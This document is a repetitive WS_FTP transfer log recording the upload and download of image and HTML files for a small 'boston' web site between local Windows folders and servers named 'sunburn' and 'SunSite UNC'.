10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
